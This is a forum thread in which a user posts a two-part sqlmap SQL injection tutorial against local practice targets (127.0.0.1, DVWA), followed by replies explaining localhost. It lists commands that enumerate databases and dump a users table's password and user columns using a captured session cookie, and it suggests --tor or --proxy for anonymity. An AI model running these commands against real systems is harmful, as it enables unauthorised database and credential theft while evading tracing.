SqlMap - SQL Injection with BackBox part 1/2

ZEROF · June 29, 2012, 02:18:12 PM

SqlMap

Sql Injection Tool part 1

OS/OS: BackBox Linux (version 2.05)
Target : 127.0.0.1
Vulnerable Url : 127.0.0.1/SQLInjection/injection.php?id=1

Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :

Code Select

sqlmap -u some.com/index.php?id=1 --dbs
sqlmap -D mysql data base --tables
sqlmap -D mysql data base -T table name --columns
sqlmap -D mysql data base -T table name -C column or columns name --dump

Video

http://www.youtube.com/watch?v=BDI0t1gBUMA

ZEROF · June 29, 2012, 03:07:56 PM

SqlMap + Live Http Headers Addon

Sql Injection Tool part 2

OS: BackBox Linux (version2.05)
Tool on +: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
Target: 127.0.0.1
Vulnerable Url: 127.0.0.1/dvwa/

I will use cookies from session to run SQL injection attack. Commands i use in this tutorial are next (you can add --tor to protect your privacy or --proxy ip:port) :

Code Select

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' --dbs

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa --tables

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users --columns

sqlmap -u 'target url' --cookies='information from HTTP Headers' --string='Surname' -D dvwa -T users -C password,user --dump

Video

http://youtu.be/4Dg0ODJBZxM

drego85 · July 03, 2012, 01:32:20 PM

+1

Thanks for demostration!

V3nD3774 · March 08, 2013, 10:52:36 PM

ZEROF,
is the link: 127.0.0.1/SQLInjection/injection.php?id=1 still ON ?

I did try few times but no luck.

Tx

Not Found

The requested URL /SQLInjection/injection.php was not found on this server.

b4d_bl0ck · March 09, 2013, 03:54:16 AM

Thanks for sharing, ZEROF. Nice vids.. and nice BB desktop aspect.

V3nD3774 :o
Try:

Code Select

ping 127.0.0.1If the host is reachable but you cannot access that URI, most probably your ISP is tracking you and blocking your connections, and maybe has alredy provided your data to a cybercrime investigation agency.
In this case a successful solution could be:

Code Select

less /etc/hosts also

Code Select

sudo ifconfig lo or if it's not enough try this.
Good luck!

ZEROF · March 13, 2013, 09:10:04 PM

QuoteZEROF,
is the link: 127.0.0.1/SQLInjection/injection.php?id=1 still ON ?

When you need to find path for files use whereis or find command. Let's say you want to find injection.php file in your system, you can use from terminal:

find / -name injection.php

How to use find command:

Cheers !

V3nD3774 · March 21, 2013, 11:15:53 AM

Sorry ZEROF,
I might have misunderstood your message (likely because I am a nooob..) but I was not looking how to find a file in my machine...rather was asking whether the link : 127.0.0.1/SQLInjection/injection.php?id=1 it is still a valid link...this because when i try to reach this link i just get the following message:

Not Found

The requested URL /SQLInjection/injection.php was not found on this server.
Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80

I will not even comment re b4d_bl0ck post...it is quite hilarious to say the least (...and maybe has alredy provided your data to a cybercrime investigation agency)...

Tx again,
~V

b4d_bl0ck · March 21, 2013, 12:01:36 PM

V3nD3774, sorry for my irony, i didn't want to offend you.
I just wanted encurage you to read, before getting hands on things... and i guess you didn't visit the link i provided you. :)
What i was trying to explain you is that 127.0.0.1 is nothing more than your PC. If you have no Apache server running on your system listening on port 80, or you have no resource on your server named /SQLInjection/injection.php, you'll never be able to open it. Evidently ZEROF created a vulnerable app by his own hands or downloaded it, and put it in his server, ready to be exploited.
The URL will never be a valid link to you, until you do the same and put in your server a page with the same path and name. That's not an internet resource, but a local one, so it ha no sense asking others if it's a valid link or not... ;)
Sorry for having joked in the first reply.

Have fun!

V3nD3774 · March 22, 2013, 11:27:34 AM

tx b4d_bl0ck, now it is clearer.